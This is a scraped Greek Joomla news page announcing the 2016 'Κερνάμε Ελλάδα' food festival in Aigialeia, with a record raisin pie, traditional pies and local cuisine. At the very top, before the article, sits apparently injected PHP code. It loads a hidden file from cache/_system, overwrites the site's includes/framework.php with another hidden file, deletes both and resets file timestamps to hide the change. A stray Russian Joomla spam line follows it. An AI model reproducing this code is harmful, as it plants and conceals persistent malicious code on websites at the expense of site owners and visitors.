$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Η Αιγιάλεια θέλει καλοπέραση!
YT Expo - шаблон joomla Mp3
Εκτύπωση
PDF
27
Ιανουάριος
2016

Η Αιγιάλεια θέλει καλοπέραση!

Την Παρασκευή 19 Φεβρουαρίου στις 4μμ ανοίγει τις πύλες του το Φεστιβάλ Κερνάμε Ελλάδα – Αιγιάλεια 2016 στον Πολυχώρο Όνειρο στη Μυρτιά Αιγίου.

 

Ο Δήμος Αιγιαλείας καλεί τους παραγωγούς προϊόντων του πρωτογενή τομέα και παραδοσιακών προϊόντων να συμμετάσχουν με περίπτερο σε αυτή τη σημαντική έκθεση, που σκοπό έχει την προβολή και προώθηση των επωνύμων ελληνικών προϊόντων στο καταναλωτικό κοινό και στους χώρους εστίασης. Για το λόγο αυτό τα μέλη της Λέσχης Αρχιμαγείρων Πελοποννήσου και Δυτικής Ελλάδας θα υποστηρίξουν τους εκθέτες, προβάλλοντας τα προϊόντα τους με γαστρονομικές δημιουργίες βάση τα προϊόντα αυτά. Παράλληλα το φεστιβάλ αποτελεί τον τόπο για την σύναψη εμπορικών και επιχειρηματικών συμφωνιών μεταξύ των παραγωγών και επιχειρήσεων παραγωγής και διακίνησης αγροτικών και παραδοσιακών προϊόντων.

                                                                                                                                                                                                                                                      

Η Λέσχη Αρχιμαγείρων και Αρχιζαχαροπλαστών,

σε συνεργασία με την Συντεχνία Αρτοποιών Αιγιαλείας και Καλαβρύτων, και το Σύλλογο Βιοτεχνών Ζαχαροπλαστών Αχαΐας θα παρασκευάσουν στα πλαίσια του Φεστιβάλ  τη μεγαλύτερη σταφιδόπιτα του κόσμου, (διαστάσεις αξιολόγησης για το βιβλίο Γκίνες), η οποία θα κοπεί κατά τη διάρκεια των επίσημων εγκαινίων και θα μοιραστεί στους επίσημους προσκεκλημένους και τους επισκέπτες του Φεστιβάλ.


Στο τέλος της έκθεσης όλοι όσοι επισκεφθούν το Φεστιβάλ θα γευτούν πληθώρα εδεσμάτων από όλη την Ελλάδα. Σε περίοπτη θέση σε μια προσπάθεια ανάδειξης της αξίας της θα παρουσιαστεί η   Τοπική Κουζίνα της Αχαΐας  με συνεργασία των Συλλόγων Αιγιαλείας.


Για πρώτη φορά στα Ελληνικά δεδομένα, τα μέλη της Λέσχης Αρχιμαγείρων Πελοποννήσου & Δυτικής Ελλάδας θα καταγράψουν και θα παρουσιάσουν προς γευσιγνωσία στους επισκέπτες τις 300 πίτες. Σκοπός μας είναι η ανάδειξη του Αιγίου ως «Πόλη της Παραδοσιακής Πίτας».

 

Τιμώμενο προϊόν η σταφίδα της Βοστίτσας, ενός προϊόντος που συνέβαλε στην οικονομική ανάπτυξη της Αιγιαλείας και της Ελλάδος γενικότερα. Η Λέσχη Αρχιμαγείρων Πελοποννήσου και Δυτικής Ελλάδας Θα παρουσιάσει τις Εκατό και Μία συνταγές με Σταφίδα.


Νηστίσιμη Διατροφή αλλά και Μοναστηριακή Διατροφή της Αχαΐας είναι δυο ακόμα σημαντικοί πυλώνες του Γαστρονομικού Τομέα του Φεστιβάλ που θα έχουν την ευκαιρία οι επισκέπτες να παρακολουθήσουν αλλά και να γευτούν.

 

Οι μικροί μας φίλοι θα έχουν την ευκαιρία να απασχοληθούν δημιουργικά καθόλη τη διάρκεια του τριήμερου στον παιδότοπο του φεστιβάλ.